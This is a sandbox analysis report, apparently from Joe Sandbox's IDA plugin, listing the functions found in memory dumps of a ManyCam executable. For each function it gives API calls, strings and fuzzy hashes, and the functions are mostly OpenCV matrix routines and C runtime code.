Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Query$CloseFrequencyInfoOpenPerformanceSystemValue
String ID: HARDWARE\DESCRIPTION\SYSTEM\CentralProcessor\0\$~MHz
API String ID: 3168753991-3803085211
Opcode ID: d877ab79dd31b04e668ca354f0665b6347880e135f4f73598a8ff8e897a0a242
Instruction ID: 605b1171447a19da2a1eac4e87050f0122602519cc2cf19c39b3bf83bf3272ec
Opcode Fuzzy Hash: d877ab79dd31b04e668ca354f0665b6347880e135f4f73598a8ff8e897a0a242
Instruction Fuzzy Hash: 0F41C1B52143089FC320DF15E884B6BBBF4FB85365F40492DF996C3250E776D9888B66

Function 00C3DA20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000), ref: 00C3DB20
sprintf.MSVCR80 ref: 00C3DBA0
LoadLibraryA.KERNEL32(00C724D9), ref: 00C3DBA6

Part of subcall function 00C3D5E0: GetSystemInfo.KERNEL32(?,?,00000000), ref: 00C3D5FF
Part of subcall function 00C3D5E0: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\SYSTEM\CentralProcessor\0\,00000000,00000001,?), ref: 00C3D65B
Part of subcall function 00C3D5E0: RegQueryValueExA.KERNEL32(?,~MHz,00000000,00000000,?,?), ref: 00C3D67B
Part of subcall function 00C3D5E0: RegCloseKey.KERNEL32(?), ref: 00C3D69F

Strings

%s%s.dll, xrefs: 00C3DB9A

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Library$CloseFreeInfoLoadOpenQuerySystemValuesprintf
String ID: %s%s.dll
API String ID: 1854164814-1649984862
Opcode ID: 0e70d6ef1f93786a996040d2ffe2a586834ca213b9e7999ee83a6303d6ec16b0
Instruction ID: 521eda446f0071328c18535622c2e7667ee9a1e665023ca72d936f66eda41b6e
Opcode Fuzzy Hash: 0e70d6ef1f93786a996040d2ffe2a586834ca213b9e7999ee83a6303d6ec16b0
Instruction Fuzzy Hash: D541A2B55143058BCB20DF14F88932EB7E4FB81718F01491EE89A67261D3B09AC9DF96

Non-executed Functions

Function 00C000D0 Relevance: 97.1, APIs: 39, Strings: 16, Instructions: 851COMMON

Download Yara Rule

APIs

cvError.GLU32(000000E5,cvCalcCovarMatrix,NULL vec pointer,.\cxmatmul.cpp,000009B4), ref: 00C0021A
cvGetMat.GLU32(?,?,00000000,00000000), ref: 00C00235

Part of subcall function 00B9E130: cvError.GLU32(000000E5,cvGetMat,NULL array pointer is passed,.\cxarray.cpp,00000ADB,?,?,?,?), ref: 00B9E4BC

cvGetErrStatus.GLU32 ref: 00C00243

Part of subcall function 00BD6D60: malloc.MSVCR80 ref: 00BD6D6E

cvGetMat.GLU32(?,?,00000000,00000000), ref: 00C00261
cvGetErrStatus.GLU32 ref: 00C0026F
cvError.GLU32(000000FF,cvCalcCovarMatrix,Inner function failed.,.\cxmatmul.cpp,000009B7), ref: 00C0028E
cvError.GLU32(FFFFFF33,cvCalcCovarMatrix,Covariation matrix and average vector should have the same types,.\cxmatmul.cpp,000009BB), ref: 00C002C4

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

cvError.GLU32(FFFFFF2E,cvCalcCovarMatrix,The format of input vectors is not supported,.\cxmatmul.cpp,00000A6E), ref: 00C00953
cvFree_.GLU32(?), ref: 00C00CBF
cvReleaseMat.GLU32(?,?), ref: 00C00CCC

Strings

All input vectors and average vector must have the same size, xrefs: 00C007C6
cvCalcCovarMatrix, xrefs: 00C00213, 00C00287, 00C002BA, 00C0030F, 00C003A4, 00C0043B, 00C0048F, 00C004C5, 00C0051D, 00C00732, 00C0075F, 00C00782, 00C007A5, 00C007CB, 00C00949
The vector count and covariance matrix size do not match, xrefs: 00C00518
All input vectors must have the same type, xrefs: 00C007A0
All vectors must have a single channel, xrefs: 00C0075A
Covariation matrix and average vector should have the same types, xrefs: 00C002B5
The format of input vectors is not supported, xrefs: 00C0072D, 00C00944
NULL vec pointer, xrefs: 00C0020E
The number of vectors is zero or negative, xrefs: 00C0048A
, xrefs: 00C00AA4
.\cxmatmul.cpp, xrefs: 00C00209, 00C0027D, 00C002B0, 00C002E9, 00C00305, 00C0039A, 00C00431, 00C00485, 00C004BB, 00C00513, 00C00728, 00C00755, 00C00778, 00C0079B, 00C007C1, 00C0093F
Covariation matrix must be square, xrefs: 00C0030A
The number of input vectors does not match to avg vector size, xrefs: 00C0039F, 00C00436
Covariation matrix must be 32fC1 or 64fC1, xrefs: 00C002EE
The size of input vectors does not match with the size of covariation matrix, xrefs: 00C004C0
Inner function failed., xrefs: 00C00282, 00C0077D

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error$Status$Free_Releasemalloc
String ID: $.\cxmatmul.cpp$All input vectors and average vector must have the same size$All input vectors must have the same type$All vectors must have a single channel$Covariation matrix and average vector should have the same types$Covariation matrix must be 32fC1 or 64fC1$Covariation matrix must be square$Inner function failed.$NULL vec pointer$The format of input vectors is not supported$The number of input vectors does not match to avg vector size$The number of vectors is zero or negative$The size of input vectors does not match with the size of covariation matrix$The vector count and covariance matrix size do not match$cvCalcCovarMatrix
API String ID: 1144712305-2216315964
Opcode ID: 7efbf5d6d833308c366ddb79413c2f0b4399802c642332ae2dfd28580fe968ce
Instruction ID: 153e38cb7c38d93c3e389180bddfc7a96ba8f4db5298593149b03ecf56acac01
Opcode Fuzzy Hash: 7efbf5d6d833308c366ddb79413c2f0b4399802c642332ae2dfd28580fe968ce
Instruction Fuzzy Hash: A9729D71A08300DBD720DF15D881B1ABBF1FB95304F228A6DE590973A2E7B1E955CF92

Function 00BFE110 Relevance: 63.6, APIs: 32, Strings: 3, Instructions: 2324COMMON

Download Yara Rule

APIs

cvGetMat.GLU32(?,?,?,00000000), ref: 00BFE177
cvGetErrStatus.GLU32 ref: 00BFE182
cvError.GLU32(000000FF,cvGEMM,Inner function failed.,.\cxmatmul.cpp,0000028F), ref: 00BFE1A1
cvError.GLU32(000000E8,cvGEMM,00C4124F,.\cxmatmul.cpp,00000280), ref: 00BFE1C9
cvGetMat.GLU32(?,?,?,00000000), ref: 00BFE1FF
cvGetErrStatus.GLU32 ref: 00BFE20A
cvError.GLU32(000000E8,cvGEMM,00C4124F,.\cxmatmul.cpp,000002A0), ref: 00BFE238
cvGetMat.GLU32(?,?,?,00000000), ref: 00BFE26C
cvGetErrStatus.GLU32 ref: 00BFE279
cvGetMat.GLU32(?,?,?,00000000), ref: 00BFE2DE
cvGetErrStatus.GLU32 ref: 00BFE2E9
cvError.GLU32(FFFFFF33,cvGEMM,00C4124F,.\cxmatmul.cpp,000002A4), ref: 00BFE338
cvError.GLU32(FFFFFF2F,cvGEMM,00C4124F,.\cxmatmul.cpp,000002A8), ref: 00BFE38C
cvTranspose.GLU32(?,00000000), ref: 00BFE3A9
cvError.GLU32(FFFFFF2F,cvGEMM,00C4124F,.\cxmatmul.cpp,000002C9), ref: 00BFE475
cvError.GLU32(FFFFFF2F,cvGEMM,00C4124F,.\cxmatmul.cpp,000002D0), ref: 00BFE4BA
cvError.GLU32(FFFFFF2F,cvGEMM,00C4124F,.\cxmatmul.cpp,000002D7), ref: 00BFE4FB
cvError.GLU32(FFFFFF2F,cvGEMM,00C4124F,.\cxmatmul.cpp,000002DE), ref: 00BFE53C

Strings

cvGEMM, xrefs: 00BFE19A, 00BFE1C2, 00BFE231, 00BFE32E, 00BFE382, 00BFE46B, 00BFE4B0, 00BFE4F1, 00BFE532, 00BFF2FB, 00BFFBC4, 00BFFC13
.\cxmatmul.cpp, xrefs: 00BFE190, 00BFE1B8, 00BFE227, 00BFE324, 00BFE378, 00BFE461, 00BFE4A6, 00BFE4E7, 00BFE528, 00BFF2F1, 00BFFBBA, 00BFFC09
Inner function failed., xrefs: 00BFE195, 00BFFBBF

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error$Status$Transpose
String ID: .\cxmatmul.cpp$Inner function failed.$cvGEMM
API String ID: 3014044127-1641548190
Opcode ID: 5e4bb57ab0d67f09fb37dc42e6f65dd68b769c3373273c4063ecdc2fdd50ab7f
Instruction ID: ad52163c7682114d282b33ef7937ec35ab53b74df50db5d80793dbaf01f4af94
Opcode Fuzzy Hash: 5e4bb57ab0d67f09fb37dc42e6f65dd68b769c3373273c4063ecdc2fdd50ab7f
Instruction Fuzzy Hash: C623AE71A0020DDBCB14DF08D9816A87BF1FF48354F2645A8E91AA7365EB31ED69CF90

Function 00BDA890 Relevance: 60.0, APIs: 29, Strings: 5, Instructions: 525COMMON

Download Yara Rule

APIs

cvGetMat.GLU32(?,?,?,00000000), ref: 00BDA90C
cvGetErrStatus.GLU32 ref: 00BDA917
cvError.GLU32(000000FF,icvLogicS,Inner function failed.,.\cxlogic.cpp,000000E5), ref: 00BDA936
cvGetMat.GLU32(?,?,?,00000000), ref: 00BDA978
cvGetErrStatus.GLU32 ref: 00BDA983
cvError.GLU32(FFFFFF30,icvLogicS,This operation on multi-dimensional arrays does not support mask,.\cxlogic.cpp,000000E3), ref: 00BDA9C4
cvInitNArrayIterator.GLU32(00000002,?,00000000,?,?,00000000), ref: 00BDA9E7
cvGetErrStatus.GLU32 ref: 00BDA9EF
cvScalarToRawData.GLU32(?,?,00000000,00000001), ref: 00BDAA59
cvGetErrStatus.GLU32 ref: 00BDAA61
cvFree_.GLU32(?), ref: 00BDAE76
cvErrorFromIppStatus.GLU32(00000000,icvLogicS,OpenCV function failed,.\cxlogic.cpp,00000142), ref: 00BDAEB4
cvError.GLU32(00000000,00000142), ref: 00BDAEBD
cvError.GLU32(FFFFFF2F,icvLogicS,00C4124F,.\cxlogic.cpp,00000118), ref: 00BDAEE0
cvError.GLU32(FFFFFF2F,icvLogicS,00C4124F,.\cxlogic.cpp,000000FF), ref: 00BDAF03
cvError.GLU32(000000E8,icvLogicS,00C4124F,.\cxlogic.cpp,000000F9), ref: 00BDAF26

Strings

OpenCV function failed, xrefs: 00BDAAD4, 00BDAEA9
icvLogicS, xrefs: 00BDA92F, 00BDA9BA, 00BDAAD9, 00BDAB26, 00BDAC18, 00BDAD85, 00BDAEAE, 00BDAED6, 00BDAEF9, 00BDAF1F
.\cxlogic.cpp, xrefs: 00BDA925, 00BDA9B0, 00BDAACF, 00BDAB1C, 00BDAC0E, 00BDAD7B, 00BDAEA4, 00BDAECC, 00BDAEEF, 00BDAF15
Inner function failed., xrefs: 00BDA92A, 00BDAD80
This operation on multi-dimensional arrays does not support mask, xrefs: 00BDA9B5

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error$Status$ArrayDataFree_FromInitIteratorScalar
String ID: .\cxlogic.cpp$Inner function failed.$OpenCV function failed$This operation on multi-dimensional arrays does not support mask$icvLogicS
API String ID: 3918689138-1991039361
Opcode ID: b99aff1c0372f71f37dd1f644dcc859549baa94e59a54557fc036913c45c23b9
Instruction ID: 9a0efdf4a569f714151a8013aea008b1986a154145d3286a393395529e11fbf5
Opcode Fuzzy Hash: b99aff1c0372f71f37dd1f644dcc859549baa94e59a54557fc036913c45c23b9
Instruction Fuzzy Hash: 6612B3B1A002099BDF24DF58CC81EAAB7E6FF58304F1541AAF915AB381F375E941CB52

Function 0052309D Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 70memorylibraryloaderCOMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,?,0052317B,?,004086D8,?,00408648,0000000D,0040858E,00000000,?,?,00406405,0000040A,?,0000040A), ref: 005230A0
LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,?,0052317B,?,004086D8,?,00408648,0000000D,0040858E,00000000,?,?,00406405), ref: 005230BA
GetProcAddress.KERNEL32(00000000,InterlockedPushEntrySList), ref: 005230D4
GetProcAddress.KERNEL32(00000000,InterlockedPopEntrySList), ref: 005230E1
GetProcessHeap.KERNEL32(00000000,00000008,?,?,?,?,0052317B,?,004086D8,?,00408648,0000000D,0040858E,00000000), ref: 00523113
HeapAlloc.KERNEL32(00000000,?,?,?,?,0052317B,?,004086D8,?,00408648,0000000D,0040858E,00000000,?,?,00406405), ref: 00523116
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 0052312A
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,0052317B,?,004086D8,?,00408648,0000000D,0040858E,00000000), ref: 00523136
HeapFree.KERNEL32(00000000,?,?,?,?,0052317B,?,004086D8,?,00408648,0000000D,0040858E,00000000,?,?,00406405), ref: 00523139

Strings

InterlockedPopEntrySList, xrefs: 005230D6
kernel32.dll, xrefs: 005230B5
InterlockedPushEntrySList, xrefs: 005230CE

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Heap$AddressProcProcess$AllocCompareExchangeFeatureFreeInterlockedLibraryLoadPresentProcessor
String ID: InterlockedPopEntrySList$InterlockedPushEntrySList$kernel32.dll
API String ID: 3830925854-2586642590
Opcode ID: 045a139df42147dc29b3cf1c1bb3d0180b322a35e46f72030a23bd9566d498ff
Instruction ID: 6a309bd71f26a8b6476057eaf9253ffddd2ea6d6ddf4b4a8f55772e675858cee
Opcode Fuzzy Hash: 045a139df42147dc29b3cf1c1bb3d0180b322a35e46f72030a23bd9566d498ff
Instruction Fuzzy Hash: 7E11B276610228AFE7209F69FC899177FACFF66B51B008419F605C3250D7389814EB60

Function 00523722 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0052439E
_crt_debugger_hook.MSVCR80(00000001), ref: 005243AB
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005243B3
UnhandledExceptionFilter.KERNEL32(00575E58), ref: 005243BE
_crt_debugger_hook.MSVCR80(00000001), ref: 005243CF
GetCurrentProcess.KERNEL32(C0000409), ref: 005243DA
TerminateProcess.KERNEL32(00000000), ref: 005243E1

Strings

!ME, xrefs: 00524352

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
String ID: !ME
API String ID: 3369434319-2242867602
Opcode ID: fa064457d980cb34010aba6a9c8ddec48f34fb03e7b2cf8e25b020562b0318d8
Instruction ID: 39ba21fb788a80fe4ca9cc942bdb85b36a6e35659692cabfea893639d5bd73cc
Opcode Fuzzy Hash: fa064457d980cb34010aba6a9c8ddec48f34fb03e7b2cf8e25b020562b0318d8
Instruction Fuzzy Hash: 9521B0B4901214DFE700DF69FD4E6457BB4FB2A308F10441AF508877A0E7B0568DAF15

Function 00BD8970 Relevance: 8.8, APIs: 5, Instructions: 1310COMMON

Download Yara Rule

APIs

_CIsqrt.MSVCR80 ref: 00BD8A78

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Isqrt
String ID:
API String ID: 4112084577-0
Opcode ID: c817e59110380b6b5c576002c48fa38d88d23d13ff31d4ad9104bcc18176370b
Instruction ID: d7bd19fa3dd07cfdb4dbc90d1e385bcb23e6831df3154df7329b7e2b081428f0
Opcode Fuzzy Hash: c817e59110380b6b5c576002c48fa38d88d23d13ff31d4ad9104bcc18176370b
Instruction Fuzzy Hash: 01C22EB2E05301EFC715AE04D18519ABFF0FB84390F624D4CE5D5A62AEFA3199348EC6

Function 00488A00 Relevance: 7.6, APIs: 5, Instructions: 63COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(00000000,0047AE1E,00000006,?,0047AE1E), ref: 00488A3B
GetLastError.KERNEL32(?,0047AE1E), ref: 00488A4A
SizeofResource.KERNEL32(00000000,00000000,?,0047AE1E), ref: 00488A5A
GetLastError.KERNEL32(?,0047AE1E), ref: 00488A67
GetLastError.KERNEL32(000000FF,00000000,00000000,00000000,00000000,00000000,?,0047AE1E), ref: 00488AA8

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: ErrorLast$Resource$FindSizeof
String ID:
API String ID: 1187693681-0
Opcode ID: 65827e7e1ba533ac49771d736c66928104eedf98d9c70884fcfb5a62a0082481
Instruction ID: c0cef2afab0bd7fe4f68a4e2e270c34d254ae90ade39b42375e279ad05fcd0b3
Opcode Fuzzy Hash: 65827e7e1ba533ac49771d736c66928104eedf98d9c70884fcfb5a62a0082481
Instruction Fuzzy Hash: 13215EB490410CAFDF04EFA8C894AAEBBB5AF58304F50855EF516E7380DB349A40DBA5

Function 004B7920 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,0050F176,00000000,?,?,?,?,?,?,744843B1), ref: 004B7929
FormatMessageW.KERNEL32(00001100,00000000,00000000,00000400,00000000,00000000,00000000), ref: 004B7951

Part of subcall function 004B77A0: fwprintf.MSVCR80 ref: 004B7842
Part of subcall function 004B77A0: fflush.MSVCR80 ref: 004B7852

GlobalFree.KERNEL32(00000000), ref: 004B797D

Strings

Error %lu(%XH): %s, xrefs: 004B7963

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: ErrorFormatFreeGlobalLastMessagefflushfwprintf
String ID: Error %lu(%XH): %s
API String ID: 800684769-2225916613
Opcode ID: 9c25a239c4296b40a1aac8e3427c21774919ee94bcf497bff91ff5139ac85dd7
Instruction ID: 92133e916cea4efcc1403b83aedde9febef4d0811e6201f309352de0de206619
Opcode Fuzzy Hash: 9c25a239c4296b40a1aac8e3427c21774919ee94bcf497bff91ff5139ac85dd7
Instruction Fuzzy Hash: 42F0AFB9E40208BBE714DBD4DC46F9EBB78AB58701F104159FB04A7280D7B06A45DBA5

Function 004164A0 Relevance: 6.1, APIs: 4, Instructions: 97filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416650: FindClose.KERNEL32(55C35DE5,00000000,?,004164B1,00000000,000001E2,-0000012B), ref: 00416686

lstrlenW.KERNEL32(00000000,00000000,000001E2), ref: 004164C4
FindFirstFileW.KERNEL32(00000000,00000104,000000D8,00000104,00000000), ref: 004164F5
GetFullPathNameW.KERNEL32(00000000,00000104,?,00000000), ref: 0041652C
SetLastError.KERNEL32(0000007B), ref: 0041654D

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Find$CloseErrorFileFirstFullLastNamePathlstrlen
String ID:
API String ID: 333540133-0
Opcode ID: 171f62d7d2e46f7442e9afe65942f367c9dc7a9140c3c81f7060891864299191
Instruction ID: f4e42fcc4f8ec7ae6713741ac17fac935eec9a5453ba0a6ca1ec1d98cf041219
Opcode Fuzzy Hash: 171f62d7d2e46f7442e9afe65942f367c9dc7a9140c3c81f7060891864299191
Instruction Fuzzy Hash: 8E413AB0A00219AFDB00DFA4DC84BEE77B2BF44305F11856AE515AB385C778D984CB98

Function 00BD02A0 Relevance: 6.1, Strings: 3, Instructions: 2301COMMON

Download Yara Rule

Strings

@, xrefs: 00BD15A2
@, xrefs: 00BD0C30
@, xrefs: 00BD1929

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID:
String ID: @$@$@
API String ID: 0-1177533131
Opcode ID: 0979c001310c5d1619bfaf4da0b301696b07b0efe604150a94a34993fc953d60
Instruction ID: 5f7464b3dfcd1240d0631e2edf249f2d773830eba5b5b546d11ab2e5f7ddc9bb
Opcode Fuzzy Hash: 0979c001310c5d1619bfaf4da0b301696b07b0efe604150a94a34993fc953d60
Instruction Fuzzy Hash: 3A234C72A04B059BC315AF18D044259FBF1FF88754F264E8DE4D9A7269EB32E864CBC1

Function 00BEE9C0 Relevance: 5.7, APIs: 3, Instructions: 1200COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00BEEA0D

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: __alloca_probe_16
String ID:
API String ID: 1700504859-0
Opcode ID: 76ce9ddbab93237a37b11e185a6f4aca3194ac90dd7c203518b8ccfc6fc5c4ee
Instruction ID: f9d5fa2624afa867118f801ee434570a49dae5fb80a6df321c810beabd493c8a
Opcode Fuzzy Hash: 76ce9ddbab93237a37b11e185a6f4aca3194ac90dd7c203518b8ccfc6fc5c4ee
